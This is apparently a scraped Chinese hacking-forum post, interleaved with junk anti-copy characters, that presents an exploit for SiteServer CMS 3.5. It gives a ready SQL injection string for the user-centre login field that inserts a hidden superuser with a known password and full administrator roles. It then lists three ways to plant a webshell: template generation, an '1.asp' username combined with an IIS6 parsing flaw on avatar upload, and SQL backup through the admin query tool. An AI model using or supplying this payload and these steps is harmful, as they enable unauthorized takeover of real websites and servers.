经测试秒杀最新的3.5版
: `. A: J4 x o$ w0 B$ U
# a& b0 x% v j! kstieserver官网:www.siteserver.cn
* w0 q: O F1 ~, t8 r" @+ S2 [1 i6 T- l+ C9 Z% }0 Y
: Y" r# a1 }* Z
! F# k7 x/ O8 F# E. u; l7 i+ ~$ tEXP:
- N8 M& V3 g; _
7 O! G% E5 u& n- ?) i直接访问UserCenter/login.aspx3 z& U, E; K# h4 D3 d
1 V. C& k8 O/ U5 ?* X! { 2 o6 O! }6 D# `7 { R
% m# R* i! v+ ~- x用户名处输入:! ]7 [7 z' M1 z
9 q& x! l: E9 k O, ^- Q123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
2 K3 Y! P0 y) Z! j( J/ E6 ~% L9 n/ m" D& c5 n6 p
{+ i% X0 W& S o( z3 p x
" a( N. D0 s) `0 @" a密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
) p+ g1 U5 a, w- T7 @
+ Y- u& Y, K _) v
# |: [6 m n; K
+ q! `( A0 O) E" A0 o0 q之后再访问后台SiteServer/login.aspx用插入的用户登陆* H ]) N4 N$ I' u5 G% U% h
) ]$ k/ A7 N, s) R$ Q2 F. h
# r) `& `, J0 a: n
+ \. Q( ~" z" i$ P后台拿webshell的三种方法:
/ d, O9 x% D* J+ e
( B3 F8 m1 ~# y2 n一、. S6 p( j; ^' r! U4 r4 ^& {: X! [
0 T& x- a* U0 @1 u
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx: y* K& D8 T, k% A! H! Q
4 _: Z3 O, X7 j$ X1 l二、
! H/ O2 U' h2 T" P$ q1 \8 k! K* v1 B: k
成员权限-》添加用户-》用户名为:1.asp7 T3 j7 R" A% W! K X$ S$ @
0 O+ b8 k& p6 J, V! ?http://127.0.0.1/usercenter/3 b: z2 u6 X8 _* T4 V! l
& `$ l- O5 _6 ^& c用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell2 {1 Y+ G8 N; U4 L6 A$ f
. H1 h- c0 r$ s# }(ps:后台添加用户时不会验证是否含有非法字符)
8 g8 E9 I% q: t( G( S& `
! C$ r) \9 m! g4 ]/ ?三、3 ^4 Q7 x' L! W$ `
. D4 ?' q3 a, {2 c8 J; ]系统工具-》实用工具-》机器参数查看
- x) g5 b8 v- P% C" o可以看到数据库类型、名称,WEB路径
$ Q E2 o4 n, J3 q; d2 Z. j9 {3 R4 ?0 w* x* {4 }
系统工具-》数据库工具-》SQL语句查询
2 N( y5 {% Z8 N6 g这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。" v6 D! y, W, w L
& }" F% l6 f! H/ v7 k |